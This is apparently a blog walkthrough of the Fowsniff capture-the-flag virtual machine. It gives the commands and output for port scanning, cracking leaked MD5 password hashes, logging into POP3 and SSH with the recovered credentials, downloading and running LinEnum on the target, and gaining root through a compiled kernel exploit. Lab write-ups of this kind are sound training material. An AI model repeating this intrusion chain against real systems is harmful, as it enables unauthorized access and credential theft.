Fowsniff Walkthrough

Description

I created this boot2root last year to be hosted on Peerlyst.com. It’s beginner level, but requires more than just an exploitdb search or metasploit to run.
It was created in (and is intended to be used with) VirtualBox, and takes some extra configuration to set up in VMWare.
Download it from here: Fowsniff on Vulnhub

Port scanning

The nmap port scan resulted in the following output:

root@kali:~/Downloads# nmap -A -sC -p- 192.168.43.90
Nmap scan report for fowsniff (192.168.43.90)
Host is up (0.00052s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
| http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
| pop3-capabilities: CAPA RESP-CODES USER TOP SASL(PLAIN) PIPELINING AUTH-RESP-CODE UIDL
143/tcp open  imap    Dovecot imapd
| imap-capabilities: capabilities IMAP4rev1 listed more LOGIN-REFERRALS OK
have ENABLE post-login ID SASL-IR IDLE Pre-login AUTH=PLAINA0001 LITERAL+
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms fowsniff (192.168.43.90)

First of all, I went to examine the web server. It was a single page with a notification that the website is out of service, because the corporation has been hacked.

The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this at soon as possible.

Finding the hashes

A quick search on Twitter revealed the hacked Fowsniff account. One of the tweets contained a pastebin link to the dumped hashes. Here is what the file contained:

FOWSNIFF CORP PASSWORD LEAK
            ''~``
           ( o o )
+-----.oooO--(_)--Oooo.------+
|                            |
|          FOWSNIFF          |
|            got             |
|           PWN3D!!!         |
|                            |         
|       .oooO                |         
|        (   )   Oooo.       |         
+---------\ (----(   )-------+
           \_)    ) /
                 (_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!


mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

l8r n00bz!

B1gN1nj4

Cracking the hashes

I copied the MD5 hashes to a separate file and used john to crack them, but it was only able to crack 6 of them.

root@kali:~/Downloads# john --format=RAW-MD5 dump.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2       (seina@fowsniff)
apples01         (tegel@fowsniff)
bilbo101         (mustikka@fowsniff)
skyler22         (baksteen@fowsniff)
07011972         (sciana@fowsniff)
mailcall         (mauer@fowsniff)

I thought, I should try an online cracker like hashkiller.co.uk. The result was a little better, only one password is missing, but that’s fine for me.

8a28a94a588a95b80163709ab4313aa4 MD5 : mailcall
ae1644dac5b77c0cf51e0d26ad6d7e56 MD5 : bilbo101
1dc352435fecca338acfd4be10984009 MD5 : apples01
19f5af754c31f1e2651edde9250d69bb MD5 : skyler22
90dc16d47114aa13671c697fd506cf26 MD5 : scoobydoo2
a92b8a29ef1183192e3d35187e0cfabd [Not found]
0e9588cb62f4b6f27e33d449e2ba0b3b MD5 : carp4ever
4d6e42f56e127803285a0a7649b5ab11 MD5 : orlando12
f7fd98d380735e859f8b2ffbbede5a7e MD5 : 07011972

The mail service

It was time to make use of these credentials and log in. I telnetted into the machine on port 110, which is the pop3 service. I could have used a metasploit module, but I was willing to try all of them manually. I got lucky with user seina.

root@kali:~# telnet 192.168.43.90 110
Trying 192.168.43.90...
Connected to 192.168.43.90.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280

As it turns out, the account has 2 messages, so let’s read them.

Reading the emails

Here is the first one:

retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
    id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone

Okay… At this point I knew a temporary SSH password, but I didn’t know who changed their password it already. The second message came to my rescue and revealed the sloppy user.

retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
    id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.

This message came from baksteen and know I know, he didn’t have the time to change his SSH password.

Getting SSH access

root@kali:~# ssh baksteen@192.168.43.90
baksteen@192.168.43.90's password:

                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_)
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions


   ****  Welcome to the Fowsniff Corporate Server! ****

              ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

baksteen@fowsniff:~$

I quickly looked around, but I didn’t find anything useful.

Enumeration

As for enumeration, my favorite bash script is LinEnum. You can download it from here: https://github.com/rebootuser/LinEnum
The output of this script is pretty long, so I just show the important parts.

baksteen@fowsniff:/tmp$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2018-12-09 08:20:53--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.112.133, 64:ff9b::9765:7085
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.112.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47585 (46K) [text/plain]
Saving to: ‘LinEnum.sh’

LinEnum.sh                100%[===================================>]  46.47K  --.-KB/s    in 0.08s   

2018-12-09 08:20:53 (605 KB/s) - "LinEnum.sh" saved [47585/47585]

baksteen@fowsniff:/tmp$ chmod +x LinEnum.sh
baksteen@fowsniff:/tmp$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.93

### SYSTEM ##############################################
[-] Kernel information:
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609
  (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
NAME="Ubuntu"
VERSION="16.04.4 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.4 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

Getting root access

I didn’t find anything unusual that’s why I went on to check the kernel version and search for some exploits. It didn’t take long to find the correct exploit.
Link: https://www.exploit-db.com/exploits/44298
The target machine didn’t have gcc installed, so I compiled the source code on my Kali machine and then transferred the binary to the target machine’s tmp folder.

root@kali:~/Downloads# gcc exploit.c -o exploit
root@kali:~/Downloads# scp exploit baksteen@192.168.43.90:/tmp
baksteen@192.168.43.90's password:
exploit

On the target machine, I executed the exploit…

baksteen@fowsniff:/tmp$ ./exploit
task_struct = ffff88001c045400
uidptr = ffff88001f266d84
spawning root shell
root@fowsniff:/tmp# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(baksteen)

and I got a root shell. Yaay!

The only thing left is printing the flag:

    ___                        _        _      _   _             _
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
               |___/

 (_)
  |--------------
  |&&&&&&&&&&&&&&|
  |    R O O T   |
  |    F L A G   |
  |&&&&&&&&&&&&&&|
  |--------------
  |
  |
  |
  |
  |
  |
 ---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.

Before you go

If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!